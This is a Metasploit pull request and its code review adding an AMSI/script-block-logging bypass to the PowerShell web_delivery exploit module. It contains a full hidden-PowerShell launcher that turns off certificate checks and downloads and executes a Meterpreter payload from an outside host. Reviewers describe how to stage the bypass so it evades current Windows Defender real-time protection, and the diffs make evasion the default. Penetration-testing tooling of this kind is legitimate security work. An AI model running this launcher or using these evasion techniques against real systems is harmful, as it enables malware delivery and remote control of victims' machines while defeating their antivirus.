### PR TITLE
Add support for AMSI/SBL bypass to PSH web_delivery

### PR DESCRIPTION
**Pull request by phra**
Related to https://github.com/rapid7/rex-powershell/pull/17
Requires https://github.com/rapid7/rex-powershell/pull/19

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/script/web_delivery`
- [x] `set payload windows/x64/meterpreter/reverse_https`
- [x] `set LHOST ...`
- [x] `set SSL true`
- [x] `exploit -j`
- [x] Meterpreter is delivered to updated Windows machines

Example of generated command:

```bat
powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$A=new-object net.webclient;$A.proxy=[Net.WebRequest]::GetSystemWebProxy();$A.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $A.downloadstring('https://10.10.14.18:9999/UBbXnfVXjpR');
```

### CODE REVIEW

**Comment by timwr** [comment]
Looks good and the bypass is included in web_delivery. Is there an easy way of testing the effect on AMSI? It seems to work the same way before and after this change.

**Comment by timwr** [comment]
Just to be clear I'm testing on Windows 10 x64, I think the Windows defender signatures were last updated in August. With Windows defender real time protection enabled web_delivery is detected as "TrojanDropper:PowerShell/Ploty.C" (perhaps because of the base64/gzip encoding?) both before and after this change.
Without real time protection enabled I can get a session both before and after this change.

**Comment by phra** [comment]
yeah i noticed too that recently something was changed with defender. i spent 5 hours yesterday implementing a launcher for the web delivery _a là empire_ to then discover that something was detected in the randomcase version of the amsi bypass.

however i found already a way to bypass it again but i think that we would need to ship the amsi bypass as first stage before any other code. it would be easy to attach it to the launcher command generated by the web delivery but atm the stager generated at the first request invokes powershell.exe again, making useless any prior bypass. i ended up digging into obfuscating the amsi bypass and prepending it to the stage2 but amsi was flagging some random case keywords..

the only way to make it work is to ship the amsi bypass alone at the beginning:

1. web delivery payload is executed (stage0)
2. stage0 retrieve the amsi payload (stage1)
2. after stage1 is executed, the real psh payload is retrieved (stage2)

stage1 and stage2 must be executed separately, in the same powershell process, in this order.

any idea how to ship separately the amsi bypass and/or how to disable the nested powershell.exe invocation?

**Comment by timwr** [comment]
I think that's the technique used in unicorn: https://github.com/trustedsec/unicorn which bypasses AMSI for me (although meterpreter itself is still detected).
Alternatively could we (obfuscate and?) invoke the AMSI bypass before it flags stage1?

**Comment by timwr** [comment]
Please see: https://github.com/phra/rex-powershell/pull/2
It prepends the amfi bypass before the gzip compression bit, which works for me on Windows 10 with real time protection enabled.

**Comment by phra** [comment]
@timwr i am going to check this PR in the following days, sorry for the delay.

File: lib/msf/core/exploit/powershell.rb [hunk 1]
```diff
@@ -9,12 +9,13 @@ def initialize(info = {})
...
         OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
         OptInt.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
+        OptBool.new('Powershell::prepend_protections_bypass', [true, 'Prepend AMSI/SBL bypass', true]),
         OptBool.new('Powershell::strip_comments', [true, 'Strip comments', true]),
         OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
         OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
         OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
-        OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]),
-        OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]),
+        OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', true]),
```
Comment (timwr) [inline lib/msf/core/exploit/powershell.rb]: @phra surely this will have side effects in other modules?

Comment (timwr) [reply lib/msf/core/exploit/powershell.rb]: And surely it was already true in web_delivery? https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/script/web_delivery.rb#L170

**Comment by phra** [comment]
i noticed that amsi/sbl bypass + msf stager, when `:encode_final_payload` is enabled, it doesn't fit the 8192 limit of cmd.exe. btw it sometimes works when setting `Powershell::method` to `old`. e.g. powershell -e AyAsd... that could have been handy for `psh-cmd` stagers with amsi support.

**Comment by phra** [comment]
`set Powershell::remove_comspec true` and `set Powershell::exec_in_place true` are currently needed to make the module work without changing the defaults.

**Comment by phra** [comment]
with `set Powershell::encode_final_payload true` it will now produce an encoded launcher:

image

File: modules/exploits/multi/script/web_delivery.rb [hunk 2]
```diff
@@ -103,6 +105,10 @@ def initialize(info = {})
 
   register_advanced_options(
     [
+      OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', true]),
```
Comment (timwr) [inline modules/exploits/multi/script/web_delivery.rb]: Are these Powershell:: options really necessary here? If you want to override the default we can do something like: https://github.com/phra/metasploit-framework/pull/1

**Comment by timwr** [comment]
fyi this works great with both encode_final_payload as true and false with Windows defender enabled and updated.

File: modules/exploits/multi/script/web_delivery.rb (hunk 2 above)
Comment (phra) [reply modules/exploits/multi/script/web_delivery.rb]: fixed.

**Review by phra — COMMENTED** [review]
LGTM.

**Review by timwr — APPROVED** [review]
This is looking good. I will merge this next week unless anyone can spot any breakages.

**Comment by phra** [comment]
Awesome!

**Comment by timwr** [comment]
## Release Notes

This change adds support for a powershell AMSI bypass which enables the web_delivery module to bypass Windows defender on Windows 10.

**Comment by phra** [comment]
🚀

**Pull request merged**